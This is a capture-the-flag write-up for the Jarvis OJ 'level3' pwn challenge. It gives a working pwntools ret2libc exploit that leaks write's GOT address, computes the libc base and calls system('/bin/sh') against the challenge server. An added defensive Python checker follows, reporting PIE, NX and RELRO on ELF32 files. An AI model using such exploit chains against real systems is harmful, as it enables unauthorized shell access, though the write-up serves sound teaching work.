jarvis oj PWN - level3
阿新 • Published: 2021-08-02
Approach:
1. Use write to leak a GOT address, then compute the offset against libc to obtain the addresses of system and /bin/sh.
2. Overwrite past EBP so the function returns into the main function and runs a second time.
3. On this second run, overwrite again to execute system("/bin/sh").
Key arguments on the stack: address of write, return address, 1 (fd), output address (the GOT entry), 4 (4 bytes).
```python
from pwn import *

is_debug = False
# is_debug = True
# context(log_level='debug', arch='i386', os='linux')

io = remote("pwn2.jarvisoj.com", 9879)
# io = process('level3')

if is_debug:
    gdb.attach(io, '''
    b *0x08048483
    ''')

e = ELF('level3')
main_addr = e.symbols['vulnerable_function']  # return here to get a second overflow
write_plt = e.symbols['write']                # write@plt, at a fixed address (no PIE)
write_got = e.got['write']                    # GOT slot holding the resolved libc write address

# libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('libc-2.19.so')                    # libc shipped with the challenge
libc_write = libc.symbols['write']

junk = (0x88 + 4) * b'a'                      # 0x88 bytes of buffer plus the saved ebp

# Stage 1: write(1, write_got, 4) leaks write's libc address, then return to vulnerable_function
payload1 = flat(junk, write_plt, main_addr, 1, write_got, 4)
r = io.recvline()
print('recv is ', r)
io.sendline(payload1)

addr = io.recv()[:4]
true_address = u32(addr)
offset = true_address - libc_write            # libc load base relative to the symbol's static value
system = libc.symbols['system'] + offset
sh_addr = next(libc.search(b'/bin/sh')) + offset

# Stage 2: system("/bin/sh"); the 1 is a dummy return address
payload2 = flat(junk, system, 1, sh_addr)
io.sendline(payload2)
io.interactive()
```
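The chain above depends on level3 having no PIE: write@plt, write's GOT slot and vulnerable_function are all used at fixed addresses straight from the ELF. The hardening state is therefore the first thing a defender checks. The following is an added example, not part of this writeup, that reads the ELF32 program headers and dynamic section and reports PIE, NX and RELRO; `build_sample` produces a constructed, headers-only ELF image for testing and is not the challenge binary.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW, PF_X, ET_DYN = 0x8, 0x1, 0x1, 3


def hardening_report(elf: bytes) -> dict:
    """Report PIE / NX / RELRO for a 32-bit little-endian ELF image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1:
        raise ValueError("not a 32-bit ELF")
    (e_type,) = struct.unpack_from("<H", elf, 16)
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    stack_exec, relro_seg, bind_now = True, False, False  # assume worst until proven otherwise
    for i in range(e_phnum):
        ph = struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        p_type, p_offset, p_filesz, p_flags = ph[0], ph[1], ph[4], ph[6]
        if p_type == PT_GNU_STACK:
            stack_exec = bool(p_flags & PF_X)      # NX means the stack segment lacks PF_X
        elif p_type == PT_GNU_RELRO:
            relro_seg = True                       # GOT made read-only after relocation
        elif p_type == PT_DYNAMIC:
            for j in range(0, p_filesz, 8):        # Elf32_Dyn entries: d_tag, d_val
                tag, val = struct.unpack_from("<iI", elf, p_offset + j)
                if tag == DT_NULL:
                    break
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                    bind_now = True                # eager binding: full RELRO possible
    relro = "full" if relro_seg and bind_now else "partial" if relro_seg else "none"
    return {"pie": e_type == ET_DYN, "nx": not stack_exec, "relro": relro}


def build_sample(pie: bool, nx: bool, relro: str) -> bytes:
    """Constructed ELF32 image (headers + dynamic section only) for testing; not runnable."""
    dyn = struct.pack("<iI", DT_FLAGS_1, DF_1_NOW) if relro == "full" else b""
    dyn += struct.pack("<iI", DT_NULL, 0)
    dyn_off = 52 + 3 * 32                          # ELF header + three program headers
    phdrs = struct.pack("<8I", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4)
    phdrs += struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, 6 | (0 if nx else PF_X), 16)
    phdrs += struct.pack("<8I", PT_GNU_RELRO if relro != "none" else 0, 0, 0, 0, 0, 0, 4, 1)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\0" * 8   # ELFCLASS32, little-endian
    hdr = ident + struct.pack("<HHIIIIIHHHHHH", ET_DYN if pie else 2, 3, 1, 0, 52, 0, 0,
                              52, 32, 3, 40, 0, 0)
    return hdr + phdrs + dyn


if __name__ == "__main__":
    print(hardening_report(build_sample(pie=False, nx=True, relro="partial")))
```

RELRO only makes the GOT unwritable; it does not stop the read-based leak used here, which is why PIE (randomising the addresses the chain hard-codes) is the mitigation that matters for this technique. Run it on a real file with `hardening_report(open("level3", "rb").read())`.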